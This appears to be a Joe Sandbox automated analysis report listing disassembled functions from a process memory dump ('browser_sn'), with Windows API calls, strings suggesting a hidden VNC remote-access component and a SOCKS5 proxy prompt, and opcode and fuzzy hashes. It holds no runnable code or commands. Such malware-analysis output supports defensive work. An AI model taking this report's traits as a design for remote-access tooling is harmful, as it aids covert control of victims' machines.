LeaveCriticalSection.KERNEL32 ref: 00007FF790CC79E9
CreateSemaphoreA.KERNEL32 ref: 00007FF790CC7A03
GetLastError.KERNEL32 ref: 00007FF790CC7A15

Part of subcall function 00007FF790CF2950: RaiseException.KERNEL32 ref: 00007FF790CF29CB

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
String ID:
API String ID: 1747828912-0
Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
Instruction ID: 2df582b219a3dd22831090320ad6b44b946b194626c3588712a8be1c299d04d2
Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
Instruction Fuzzy Hash: F9113872A28B51A6E7149F35E984159B7B4FB48B90F90613AEB4D43B50CF38F071CB50

Function 00007FF790C592C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C592F0

Part of subcall function 00007FF790CC7520: EnterCriticalSection.KERNEL32 ref: 00007FF790CC7534
Part of subcall function 00007FF790CC7520: ReleaseSemaphore.KERNEL32 ref: 00007FF790CC7577
Part of subcall function 00007FF790CC7520: GetLastError.KERNEL32 ref: 00007FF790CC7581
Part of subcall function 00007FF790CC7520: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC758C

Part of subcall function 00007FF790CC7400: EnterCriticalSection.KERNEL32 ref: 00007FF790CC7427
Part of subcall function 00007FF790CC7400: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7472
Part of subcall function 00007FF790CC7400: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC747B
Part of subcall function 00007FF790CC7400: WaitForSingleObject.KERNEL32 ref: 00007FF790CC748A
Part of subcall function 00007FF790CC7400: EnterCriticalSection.KERNEL32 ref: 00007FF790CC7495
Part of subcall function 00007FF790CC7400: GetLastError.KERNEL32 ref: 00007FF790CC74A7
Part of subcall function 00007FF790CC7400: EnterCriticalSection.KERNEL32 ref: 00007FF790CC74DE
Part of subcall function 00007FF790CC7400: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7500

Strings

b, xrefs: 00007FF790C592E5
vncclient.cpp : enable/disable synced, xrefs: 00007FF790C5935C
vncclient.cpp : disable update thread, xrefs: 00007FF790C59321

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
API String ID: 1962697109-2518527632
Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
Instruction ID: 1ea6d66e78c05cd0c95aa5b9d356ead953cde56da706f201b12689fd06005a80
Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
Instruction Fuzzy Hash: B6117F71A28A8281EB24EF35D4002E9A3A1FF85BA4F885235D95E473E9DF3CE404C760

Function 00007FF790C47960 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C47978
SetEvent.KERNEL32 ref: 00007FF790C4798E
LeaveCriticalSection.KERNEL32 ref: 00007FF790C47A08
DeleteCriticalSection.KERNEL32 ref: 00007FF790C47A1E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterEventLeave
String ID:
API String ID: 3772564070-0
Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
Instruction ID: be46e9bdd21ba6dbde761a9c00c69ae5f85fadbfdd6a30d29e4ddaeaf5b4bf08
Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
Instruction Fuzzy Hash: 2521C866A39A4691FB24AF35D8943B4F3A1AF89B45FC42132C80E427A08F3CF585C361

Function 00007FF790CC7520 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790CC7534
ReleaseSemaphore.KERNEL32 ref: 00007FF790CC7577
GetLastError.KERNEL32 ref: 00007FF790CC7581
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC758C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
String ID:
API String ID: 540623443-0
Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction ID: 707f1b58ca20dcd3330818253dc94b9faf62400a2124bc35a3f2f3ea30a7aa6a
Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction Fuzzy Hash: 57117C22A38A5286DBA0EF71D4806B8A3F0FF88B84F806431DA4E43714DF38E085C710

Function 00007FF790C49570 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF790C4957C
ExtEscape.GDI32 ref: 00007FF790C4959E
ExtEscape.GDI32 ref: 00007FF790C495BB
ReleaseDC.USER32 ref: 00007FF790C495C6

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Escape$Release
String ID:
API String ID: 2350829361-0
Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction ID: dde748d27117499ef084a6b429d4bfc8527a6dbf87609449c2bf584e053f4f3f
Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction Fuzzy Hash: 67F01D32B2864287E7349B31B955A2AF6F5FB88784F945139EE4E46F54CE3CE0518B04

Function 00007FF790C3BCB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF790C3BE11
recv.WS2_32 ref: 00007FF790C3BE51

Strings

Enter SOCKS5 password for %s@%s: , xrefs: 00007FF790C3BCF7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: recvsend
String ID: Enter SOCKS5 password for %s@%s:
API String ID: 740075404-2439350543
Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
Instruction ID: 49701a168a9c49ccaa3ea66b05a182f2aa22c28138abfbcd0a31769fd9a773c8
Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
Instruction Fuzzy Hash: 63510462628A8184E7309B39A4403F9AA91FF46BB8F945335EF6D43BD5DF3CE4058710

Function 00007FF790C3AED0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF790C3B015

Strings

., xrefs: 00007FF790C3AFC0
., xrefs: 00007FF790C3AF50

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: htonl
String ID: .$.
API String ID: 2009864989-3769392785
Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
Instruction ID: 111c67d97ca668c500841ca92b4a91acb0693996274d9a6c4291371238ce9206
Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
Instruction Fuzzy Hash: DF41E75192C68209F735BA7298501FEFAD09F47B94F985031EA6E863C7CE2DF8058320

Function 00007FF790CF4AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CF4B3D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF4B48

Strings

SecureVNC;0;0x%08x;%s, xrefs: 00007FF790CF4B0B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: SecureVNC;0;0x%08x;%s
API String ID: 2959964966-2465057312
Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
Instruction ID: 654f512ffaa3dfce82a9c47c7399d6024191729bac65928b359563593e362af9
Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
Instruction Fuzzy Hash: CB21E532B24B119AE721EF7298515EDB7A4BF097A8B940136EF5C53B89CE38E401C351

Function 00007FF790CE89E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CE8969
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE8974

Strings

B, xrefs: 00007FF790CE8999

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
Instruction ID: aa3859ed75024cabd18e84ecd726765986d205521cf26b92b3d3e927ab0f631a
Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
Instruction Fuzzy Hash: CB117532B2874185E730AB36A4402ADF6A0FF85BD4F944231EB8D17B96CE3CE544DB15

Function 00007FF790C441E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF790C44212

Part of subcall function 00007FF790CE7DE8: _errno.LIBCMT ref: 00007FF790CE7E00
Part of subcall function 00007FF790CE7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7E0C

SendDlgItemMessageA.USER32 ref: 00007FF790C44274

Strings

<, xrefs: 00007FF790C4423A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Item$MessageSend_errno_invalid_parameter_noinfo
String ID: <
API String ID: 2439412506-4251816714
Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
Instruction ID: 87f4d1d0350f33f7b02db4ef7dae548eba4f70149ecc50d2431687bb200df74c
Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
Instruction Fuzzy Hash: A6114F72A2864196E7609F22F4107AAB360FBC8B44F945131EB8D07B55CF3CE956CB50

Function 00007FF790C43EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C43F18
PlaySoundA.WINMM ref: 00007FF790C43F85

Strings

ding_dong.wav, xrefs: 00007FF790C43F59

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: FileModuleNamePlaySound
String ID: ding_dong.wav
API String ID: 3032721342-215479118
Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
Instruction ID: 26c23f6c1688eff205f29fc8d7cb68ccf6666bb354694213e47a2d0585bdf839
Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
Instruction Fuzzy Hash: BE114222A2464591E734DB35F85136AB2A0FF48760F805336EAAD477D4DF3CE114C710

Function 00007FF790CE8B14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CE8B4D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE8B58

Strings

I, xrefs: 00007FF790CE8B8D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: I
API String ID: 2959964966-3707901625
Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
Instruction ID: 182dcf648323d980c3862cc50004c2c1773adf4fad3ffc7a2d4438f05e862f04
Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
Instruction Fuzzy Hash: 9A11A372A1874086EB20AF22A5402A9B7A4FF95FD0F544231EF9C17B95CF3CE5458B00

Function 00007FF790C3D9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 00007FF790C3DA07
MapViewOfFile.KERNEL32 ref: 00007FF790C3DA2D

Strings

{34F673E0-878F-11D5-B98A-00B0D07B8C7C}, xrefs: 00007FF790C3D9FB

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
API String ID: 3439327939-3305976270
Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction ID: 3d3c5270e731c7c588a1fe30d7abd82e14682ed4a7efdc996d83862f09d96fb8
Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction Fuzzy Hash: 73015E32529B9486E720DB75F4417AAF3A0FB84B64F894235D69A06B94CF7CE450C750

Function 00007FF790C3DA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

